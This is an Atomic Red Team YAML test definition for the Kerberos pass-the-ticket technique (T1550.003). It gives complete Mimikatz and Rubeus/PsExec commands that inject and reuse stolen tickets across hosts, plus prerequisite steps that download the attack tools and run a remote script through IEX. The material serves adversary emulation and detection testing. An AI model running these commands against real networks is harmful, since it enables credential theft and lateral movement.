atomic-red-team/atomics/T1550.003/T1550.003.yaml
Carrie Roberts d4709021fb Handle spaces in file paths (#2535)
* updating atomics count in README.md [ci skip]

* wip

* handle spaces in path

* update readme

* fix typo

---------

Co-authored-by: publish bot <opensource@redcanary.com>
2023-09-22 10:47:25 -06:00

attack_technique: T1550.003
display_name: 'Use Alternate Authentication Material: Pass the Ticket'
atomic_tests:
- name: Mimikatz Kerberos Ticket Attack
  auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098
  description: |
    Similar to PTH, but attacking Kerberos
  supported_platforms:
  - windows
  input_arguments:
    ticket:
      description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module)
      type: string
      default:
    mimikatz_exe:
      description: Path of the Mimikatz binary
      type: path
      default: PathToAtomicsFolder\..\ExternalPayloads\bin\x64\mimikatz.exe
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Mimikatz must exist on disk at specified location (#{mimikatz_exe})
    prereq_command: |
      if (Test-Path "#{mimikatz_exe}") {exit 0} else {exit 1}
    get_prereq_command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
      $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
      $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
      $basePath = Split-Path "#{mimikatz_exe}" | Split-Path
      Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
  executor:
    command: |
      "#{mimikatz_exe}" "kerberos::ptt #{ticket}"
    name: command_prompt
- name: Rubeus Kerberos Pass The Ticket
  auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb
  description: |
    Requesting a TGT on a remote system and retrieving it locally before requesting a service ticket with it. This is a Pass-The-Ticket attack because the TGT is obtained on the remote system, then used from a different machine (local).
    PsExec is used to execute commands on the remote system, and the "C$" admin share is used to retrieve the TGT, so the current user must have admin rights remotely and other PsExec prerequisites must be met.
  supported_platforms:
  - windows
  input_arguments:
    target:
      description: Remote system to request the TGT from
      type: string
      default: localhost
    user_name:
      description: username associated with the ticket (privileged account not required)
      type: string
      default: Administrator
    password:
      description: password for user_name
      type: string
      default: Password
    domain:
      description: domain
      type: string
      default: $Env:USERDOMAIN
    rubeus_url:
      description: URL of Rubeus executable
      type: url
      default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Rubeus must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe"
    prereq_command: |
      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
      Invoke-Webrequest -Uri #{rubeus_url} -OutFile "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe"
  - description: |
      PsExec must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe"
    prereq_command: |
      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") {exit 0} else {exit 1}
    get_prereq_command: |
      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
      Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
      New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") -Force | Out-Null
      Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force
  executor:
    name: powershell
    elevation_required: true
    command: |
      & "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula \\#{target} -w c:\ -c "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi
      Set-Location "PathToAtomicsFolder\..\ExternalPayloads"
      Move-Item -Force "\\#{target}\c$\ticket.kirbi" ticket.kirbi
      Write-Host "Successfully retrieved TGT from '#{target}', now requesting a TGS from local"
      & "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt
      Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\ticket.kirbi"
      & "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" purge